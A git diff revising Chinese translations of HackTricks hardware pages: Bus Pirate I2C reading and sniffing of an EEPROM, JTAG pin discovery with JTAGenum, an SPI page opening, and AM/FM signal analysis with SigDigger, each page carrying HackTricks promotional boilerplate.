* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,22 +1,23 @@
# I2C
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 总线海盗
## Bus Pirate
要测试总线海盗是否工作正常,请将+5V连接到VPU将3.3V连接到ADC然后访问总线海盗例如使用Tera Term并使用命令`~`
要测试 Bus Pirate 是否正常工作,将 +5V 连接到 VPU将 3.3V 连接到 ADC然后访问 Bus Pirate例如使用 Tera Term并使用命令 `~`
```bash
# Use command
HiZ>~
@ -55,18 +56,18 @@ Any key to exit
#Press space
Found 0 errors.
```
正如您在上一个命令行中看到的,它显示找到了 0 个错误。在购买设备或刷新固件后,了解它是否正常工作非常有用。
如您在前面的命令行中看到的它显示找到0个错误。这在购买后或刷新固件后确认其正常工作时非常有用。
要连接到总线海盗,您可以按照文档操作
要连接到bus pirate您可以参考文档
![](<../../.gitbook/assets/image (484).png>)
在这种情况下,我将连接到一个 EPROMATMEL901 24C256 PU27
在这种情况下我将连接到一个EPROMATMEL901 24C256 PU27
![](<../../.gitbook/assets/image (964).png>)
要与总线海盗通信,我使用了 Tera Term 连接到海盗总线的 COM 端口,设置为 115200 的串行端口速度。\
在以下通信中,您可以找到如何准备总线海盗以进行 I2C 通信,以及如何从存储器中写入和读取数据(注释使用“#”表示,通信中不包含这部分内容
与bus pirate通信时我使用Tera Term连接到pirate bus的COM端口设置为Setup --> Serial Port --> Speed为115200。\
在以下通信中,您可以找到如何准备bus pirate以进行I2C通信以及如何从内存中写入和读取注释部分使用"#"出现,不要期待在通信中看到那部分
```bash
# Check communication with buspirate
i
@ -167,7 +168,7 @@ NACK
```
### Sniffer
在这种情况下我们将嗅探Arduino和之前的EPROM之间的I2C通信您只需要让这两个设备进行通信然后将总线海盗连接到SCL、SDA和GND引脚:
在这个场景中,我们将嗅探 Arduino 和之前的 EPROM 之间的 I2C 通信,您只需将两个设备连接起来,然后将总线海盗连接到 SCL、SDA 和 GND 引脚:
![](<../../.gitbook/assets/image (166).png>)
```bash
@ -215,16 +216,17 @@ Sniffer
Any key to exit
[0xA0+0x00+0x69+0x41+0x41+0x41+0x20+0x48+0x69+0x20+0x44+0x72+0x65+0x67+0x21+0x20+0x41+0x41+0x41+0x00+]
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品,称为[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,36 +1,52 @@
# JTAG
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## JTAGenum
[**JTAGenum** ](https://github.com/cyphunk/JTAGenum)是一个工具可与Raspberry PI或Arduino一起使用用于查找未知芯片的JTAG引脚。\
**Arduino**中,将**2到11号引脚连接到可能属于JTAG的10个引脚**。将程序加载到Arduino中它将尝试对所有引脚进行暴力破解以查找哪些引脚属于JTAG以及每个引脚是哪个。\
**Raspberry PI**中,您只能使用**1到6号引脚**6个引脚因此在测试每个潜在的JTAG引脚时速度会较慢)。
[**JTAGenum** ](https://github.com/cyphunk/JTAGenum)是一个可以与 Raspberry PI 或 Arduino 一起使用的工具,用于尝试从未知芯片中找到 JTAG 引脚。\
**Arduino** 中,将 **引脚 2 到 11 连接到 10 个可能属于 JTAG 的引脚**。在 Arduino 中加载程序,它将尝试暴力破解所有引脚,以找出是否有引脚属于 JTAG 以及每个引脚的具体情况。\
**Raspberry PI** 中,您只能使用 **引脚 1 到 6**6 个引脚,因此测试每个潜在 JTAG 引脚的速度会更慢)。
### Arduino
Arduino中连接电缆将引脚2到11连接到JTAG引脚将Arduino GND连接到底板GND**在Arduino中加载JTAGenum程序**,并在串行监视器中发送一个**`h`**(帮助命令),您应该看到帮助信息:
Arduino 中,连接电缆后(引脚 2 到 11 连接到 JTAG 引脚Arduino GND 连接到主板 GND**在 Arduino 中加载 JTAGenum 程序**,并在串口监视器中发送 **`h`**(帮助命令),您应该会看到帮助信息:
![](<../../.gitbook/assets/image (939).png>)
![](<../../.gitbook/assets/image (578).png>)
配置**"无行结束"和115200波特率**。\
发送命令s以开始扫描:
配置 **“无行结束” 和 115200baud**。\
发送命令 s 开始扫描:
![](<../../.gitbook/assets/image (774).png>)
如果您连接到了JTAG您将找到一个或多个以**FOUND!**开头的行指示JTAG的引脚。
如果您正在连接 JTAG您将找到一条或多条 **以 FOUND! 开头的行**,指示 JTAG 的引脚。
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,157 +1,159 @@
# 无线电
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
## SigDigger
[**SigDigger** ](https://github.com/BatchDrake/SigDigger)是一个免费的数字信号分析适用于GNU/Linux和macOS旨在提取未知无线电信号的信息。它通过SoapySDR支持各种SDR设备并允许调整FSK、PSK和ASK信号的解调解码模拟视频分析突发信号并实时收听模拟语音频道。
[**SigDigger** ](https://github.com/BatchDrake/SigDigger)是一个免费的数字信号分析仪,适用于 GNU/Linux 和 macOS旨在提取未知无线电信号的信息。它通过 SoapySDR 支持多种 SDR 设备,并允许可调的 FSK、PSK 和 ASK 信号解调,解码模拟视频,分析突发信号并实时收听模拟语音通道。
### 基本配置
安装后,有一些配置可以考虑。\
在设置中(第二个选项卡按钮),您可以选择**SDR设备**或**选择文件**以读取和合成频率以及采样率如果您的PC支持建议最高为2.56Msps\\
安装后,有一些您可以考虑配置的内容。\
在设置(第二个选项卡按钮)中,您可以选择 **SDR 设备****选择一个文件** 进行读取,以及要调谐的频率和采样率(如果您的 PC 支持,建议最高可达 2.56Msps\\
![](<../../.gitbook/assets/image (245).png>)
在GUI行为中,建议启用一些功能如果您的PC支持
GUI 行为中,如果您的 PC 支持,建议启用一些选项
![](<../../.gitbook/assets/image (472).png>)
{% hint style="info" %}
如果您发现您的PC没有捕获到信号请尝试禁用OpenGL并降低采样率。
如果您发现您的 PC 没有捕获到信号,请尝试禁用 OpenGL 并降低采样率。
{% endhint %}
### 用途
* 只需**捕获一段时间的信号并分析**,只需按住“按下以捕获”按钮直到您需要的时间。
* 只需 **捕获某个信号的时间并分析它**,只需按住“推送以捕获”按钮,直到您需要的时间。
![](<../../.gitbook/assets/image (960).png>)
* SigDigger的**调谐器有助于捕获更好的信号**但也可能使其变差。理想情况下从0开始不断**增大直到**发现引入的**噪音**比您需要的**信号改进**更**大**为止
* SigDigger**调谐器** 有助于 **捕获更好的信号**(但也可能会降低信号质量)。理想情况下,从 0 开始,继续 **增大**,直到您发现引入的 **噪声** 大于您所需的 **信号改善**
![](<../../.gitbook/assets/image (1099).png>)
### 与无线电频道同步
使用[**SigDigger** ](https://github.com/BatchDrake/SigDigger)与您想要收听的频道同步,配置“基带音频预览”选项,配置带宽以获取发送的所有信息,然后将调谐器设置为在噪音真正开始增加之前的级别
使用 [**SigDigger** ](https://github.com/BatchDrake/SigDigger)与您想要收听的频道同步,配置“基带音频预览”选项,配置带宽以获取所有发送的信息,然后将调谐器设置到噪声真正开始增加之前的水平
![](<../../.gitbook/assets/image (585).png>)
## 有趣的技巧
* 当设备发送信息突发时,通常**第一部分将是前导码**,因此如果您在那里**找不到信息**或者有一些错误,**不用担心**
* 在信息帧中,通常应该**找到不同的帧并对齐它们**
* 当设备发送信息突发时,通常 **第一部分是前导码**,因此您 **不必担心** 如果您 **没有找到信息****那里有一些错误**
* 在信息帧中,您通常应该 **找到不同的帧彼此对齐**
![](<../../.gitbook/assets/image (1076).png>)
![](<../../.gitbook/assets/image (597).png>)
* **恢复位后,您可能需要以某种方式处理它们**。例如,在曼彻斯特编码中,上+下将是1或0下+上将是另一个。因此一对1和0上和下将是真正的1或真正的0。
* 即使信号使用曼彻斯特编码(不可能连续找到两个0或1您可能会在前导码中**找到几个连续的1或0**
* **恢复位后,您可能需要以某种方式处理它们**。例如,在曼彻斯特编码中,上+下将是 1 或 0下+上将是另一个。因此,成对的 1 和 0上和下将是真实的 1 或真实的 0。
* 即使信号使用曼彻斯特编码(不可能找到连续的两个 0 或 1您也可能会在前导码中 **发现多个 1 或 0**
### 使用IQ揭示调制类型
### 使用 IQ 揭示调制类型
信号中有3种存储信息的方式:调制**幅度**、**频率**或**相位**。\
如果您正在检查信号,有不同的方法可以尝试弄清楚存储信息的方式在下面找到更多方法但一个好方法是检查IQ图。
有 3 种方式在信号中存储信息:调制 **幅度**、**频率** **相位**。\
如果您正在检查信号,有不同的方法可以尝试找出用于存储信息的方式(更多方法见下文),但一个好的方法是检查 IQ 图。
![](<../../.gitbook/assets/image (788).png>)
* **检测AM**如果在IQ图中出现例如**2个圆圈**可能一个在0另一个在不同的幅度这可能意味着这是一个AM信号。这是因为在IQ图中0和圆圈之间的距离是信号的幅度因此很容易看到不同的幅度被使用
* **检测PM**:就像在前一个图像中一样,如果您发现小圆圈彼此不相这可能意味着使用了相位调制。这是因为在IQ图中点与0,0之间的角度是信号的相位这意味着使用了4个不同的相位。
* 请注意,如果信息隐藏在相位的改变而不是相位本身中,您将看不到清晰区分的不同相位
* **检测FM**IQ图中没有用于识别频率的字段(到中心的距离是幅度,角度是相位)。\
因此,要识别FM您应该在此图中**只看到基本上一个圆圈**。\
此外,IQ图中的不同频率通过圆圈上的**速度加速**来“表示”因此在SysDigger中选择信号后IQ图会填充如果您在创建的圆圈中发现加速或方向变化这可能意味着这是FM
* **检测 AM**:如果在 IQ 图中出现例如 **2 个圆圈**(可能一个在 0另一个在不同的幅度这可能意味着这是一个 AM 信号。这是因为在 IQ 图中0 和圆圈之间的距离是信号的幅度,因此很容易可视化使用的不同幅度
* **检测 PM**:如前图所示,如果您发现小圆圈彼此无关,这可能意味着使用了相位调制。这是因为在 IQ 图中,点与 0,0 之间的角度是信号的相位,这意味着使用了 4 种不同的相位。
* 请注意,如果信息隐藏在相位变化的事实中,而不是在相位本身中,您将不会看到不同的相位清晰区分
* **检测 FM**IQ 没有识别频率的字段(到中心的距离是幅度,角度是相位)。\
因此,要识别 FM您应该 **在此图中基本上只看到一个圆**。\
此外,不同的频率通过 IQ 图以 **沿圆的速度加速** 来“表示”(因此在 SysDigger 中选择信号时IQ 图被填充,如果您发现创建的圆中的加速或方向变化,这可能意味着这是 FM
## AM示例
## AM 示例
{% file src="../../.gitbook/assets/sigdigger_20220308_165547Z_2560000_433500000_float32_iq.raw" %}
### 揭示AM
### 揭示 AM
#### 检查包络
使用[**SigDigger** ](https://github.com/BatchDrake/SigDigger)检查AM信息只需查看**包络**您可以看到不同明显的幅度级别。使用的信号正在以AM发送带有信息的脉冲这是一个脉冲的外观
使用 [**SigDigger** ](https://github.com/BatchDrake/SigDigger)检查 AM 信息,仅查看 **包络**,您可以看到不同的清晰幅度级别。所用信号以 AM 发送脉冲信息,这就是一个脉冲的样子
![](<../../.gitbook/assets/image (590).png>)
是符号部分的波形外观
就是符号的一部分与波形的样子
![](<../../.gitbook/assets/image (734).png>)
#### 检查直方图
您可以**选择包含信息的整个信号**,选择**幅度**模式和**选择**,然后单击**直方图**。您会发现只有2个明显的级别
您可以 **选择信息所在的整个信号**,选择 **幅度** 模式和 **选择**,然后单击 **直方图**。您可以观察到仅发现 2 个清晰的级别
![](<../../.gitbook/assets/image (264).png>)
例如如果您在此AM信号中选择频率而不是幅度您只会找到一个频率信息调制在频率上的方式只使用1个频率)。
例如,如果您在此 AM 信号中选择频率而不是幅度,您只会找到 1 个频率(没有信息调制在频率上仅使用 1 个频率)。
![](<../../.gitbook/assets/image (732).png>)
如果发现许多频率那么这可能不是FM可能是信号频率仅因通道而发生变化。
如果您发现很多频率,这可能不会是 FM可能信号频率只是因为通道而被修改。
#### 使用 IQ
这个例子中,你可以看到有一个**大圆圈**,但也有**很多点在中心**
此示例中,您可以看到有一个 **大圆**,但也有 **很多点在中心**
![](<../../.gitbook/assets/image (222).png>)
### 获取符号
### 获取符号率
#### 使用一个符号
选择你能找到的最小符号(这样你就确定只有一个并检查“选择频率”。在这种情况下它将是1.013kHz即1kHz
选择您能找到的最小符号(以确保它只是 1),并检查“选择频率”。在这种情况下,它将是 1.013kHz(即 1kHz
![](<../../.gitbook/assets/image (78).png>)
#### 使用一组符号
你也可以指定你要选择的符号数量SigDigger将计算1个符号的频率选择的符号数量越多可能越好。在这种情况下我选择了10个符号“选择频率”为1.004千赫
您还可以指示要选择的符号数量SigDigger 将计算 1 个符号的频率(选择的符号越多,可能越好)。在这种情况下,我选择了 10 个符号,“选择频率”为 1.004 kHz
![](<../../.gitbook/assets/image (1008).png>)
### 获取比特
### 获取
已经找到这是一个**AM调制**信号和**符号速率**并知道在这种情况下上升表示1下降表示0很容易**获取信号中编码的比特**。因此,选择带有信息的信号并配置采样和决策,然后按下采样(检查已选择**幅度**,已发现的**符号速率**已配置,已选择**Gadner时钟恢复**
发现这是一个 **AM 调制** 信号和 **符号率**(并且知道在这种情况下上升意味着 1下降意味着 0非常容易 **获取信号中编码的位**。因此,选择包含信息的信号并配置采样和决策,然后按下采样(检查 **幅度** 是否被选中,发现的 **符号率** 是否已配置,以及 **Gadner 时钟恢复** 是否已选中
![](<../../.gitbook/assets/image (965).png>)
* **同步到选择间隔**表示如果你之前选择了间隔来找到符号速率,那么该符号速率将被使用
* **手动**表示将使用指定的符号速
* 在**固定间隔选择**中,你指定应该选择的间隔数量,它会从中计算符号速
* **Gadner时钟恢复**通常是最佳选项,但你仍然需要指定一些近似的符号速率。
* **同步到选择间隔** 意味着如果您之前选择了间隔以找到符号率,则将使用该符号率
* **手动** 意味着将使用指示的符号
* 在 **固定间隔选择** 中,您指示应选择的间隔数量,并从中计算符号
* **Gadner 时钟恢复** 通常是最佳选项,但您仍需指示一些近似的符号率。
按下采样后,会出现这个
按下采样后,出现以下内容
![](<../../.gitbook/assets/image (644).png>)
现在,为了让SigDigger理解**信息传递级别的范围**,你需要点击**较低级别**,并保持点击直到最大级别
现在,为了让 SigDigger 理解 **信息承载水平的范围**,您需要单击 **较低水平** 并保持按住,直到达到最高水平
![](<../../.gitbook/assets/image (439).png>)
如果例如有**4个不同的幅度级别**,你应该需要配置**每个符号的比特为2**,并从最小到最大选择
如果例如有 **4 个不同的幅度级别**,您需要将 **每个符号的位数配置为 2**,并从最小值选择到最大值
最后**增加****缩放**和**更改行大小**,你可以看到比特(你可以全选并复制以获取所有比特
最后 **增加** **缩放****更改行大小**,您可以看到位(您可以选择所有并复制以获取所有位
![](<../../.gitbook/assets/image (276).png>)
如果每个符号有多于1个比特例如2个SigDigger**无法知道哪个符号是**00、01、10、11因此它将使用不同的**灰度**来表示每个符号(如果你复制比特,它将使用**0到3的数字**,你需要处理它们)。
如果信号每个符号有超过 1 位(例如 2SigDigger **无法知道哪个符号是** 00、01、10、11因此它将使用不同的 **灰度** 来表示每个(如果您复制位,它将使用 **0 到 3 的数字**,您需要处理它们)。
此外,使用**编码**,如**曼彻斯特编码****上升+下降**可以是**1或0**,下降+上升可以是1或0。在这些情况下你需要**处理获得的上升1和下降0**以替换01或10这样的对
此外,使用 **编码****曼彻斯特**,上+下可以是 **1 或 0**,下+上可以是 1 或 0。在这些情况下您需要 **处理获得的上升1和下降0**,以替换成对的 01 或 10 为 0 或 1
## FM示例
## FM 示例
{% file src="../../.gitbook/assets/sigdigger_20220308_170858Z_2560000_433500000_float32_iq.raw" %}
@ -159,19 +161,19 @@
#### 检查频率和波形
发送信息调制在FM中的信号示例:
发送信息调制为 FM 的信号示例:
![](<../../.gitbook/assets/image (725).png>)
上图中,你可以很清楚地看到**使用了2个频率**,但如果你**观察****波形**,你可能**无法正确识别这2个不同的频率**
前面的图像中,您可以很好地观察到 **使用了 2 个频率**,但如果您 **观察** 波形,您可能 **无法正确识别 2 个不同的频率**
![](<../../.gitbook/assets/image (717).png>)
这是因为我在两个频率中捕获了信号,因此一个频率大致等于另一个频率的负值:
这是因为我在两个频率上捕获了信号,因此一个大约是另一个的负值:
![](<../../.gitbook/assets/image (942).png>)
如果同步频率**更接近一个频率而不是另一个频率**你可以很容易地看到这2个不同的频率:
如果同步频率 **更接近一个频率而不是另一个**,您可以轻松看到 2 个不同的频率:
![](<../../.gitbook/assets/image (422).png>)
@ -179,44 +181,30 @@
#### 检查直方图
检查带有信息的信号的频率直方图,你可以很容易地看到2个不同的信号:
检查带有信息的信号的频率直方图,您可以轻松看到 2 个不同的信号:
![](<../../.gitbook/assets/image (871).png>)
在这种情况下,如果你检查**幅度直方图**,你会发现**只有一个幅度**,所以它**不可能是AM**(如果你发现很多幅度,可能是因为信号在通道中失去了功率):
在这种情况下,如果您检查 **幅度直方图**,您将发现 **只有一个幅度**,因此 **不能是 AM**(如果您发现很多幅度,可能是因为信号在通道中失去了功率):
![](<../../.gitbook/assets/image (817).png>)
这将是相位直方图(这清楚表明信号不是相位调制):
这将是相位直方图(这清楚表明信号不是相位调制):
![](<../../.gitbook/assets/image (996).png>)
#### 使用 IQ
IQ没有一个字段来识别频率(到中心的距离是幅度,角度是相位)。\
因此,要识别FM你应该在这个图中**基本上只看到一个圆圈**。\
此外,IQ图中的**不同频率**通过圆圈上的**速度加速**来“表示”因此在SysDigger中选择信号后IQ图会被填充如果你在创建的圆圈中发现加速或方向变化这可能意味着这是FM
IQ 没有识别频率的字段(到中心的距离是幅度,角度是相位)。\
因此,要识别 FM您应该 **在此图中基本上只看到一个圆**。\
此外,不同的频率通过 IQ 图以 **沿圆的速度加速** 来“表示”(因此在 SysDigger 中选择信号时IQ 图被填充,如果您发现创建的圆中的加速或方向变化,这可能意味着这是 FM
![](<../../.gitbook/assets/image (81).png>)
### 获取符号
### 获取符号率
一旦找到携带符号的频率你可以使用与AM示例中使用的**相同技术**来获取符号速率。
您可以使用 **与 AM 示例中使用的相同技术** 来获取符号率,一旦您找到了承载符号的频率。
### 获取比特
### 获取
一旦**发现信号是频率调制**的,以及**符号速率**你可以使用与AM示例中使用的**相同技术**来获取比特。
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果你想看到你的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享你的黑客技巧。
</details>
您可以使用 **与 AM 示例中使用的相同技术** 来获取位,一旦您 **发现信号是频率调制的****符号率**

View file

@ -1,68 +1,71 @@
# SPI
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 基本信息
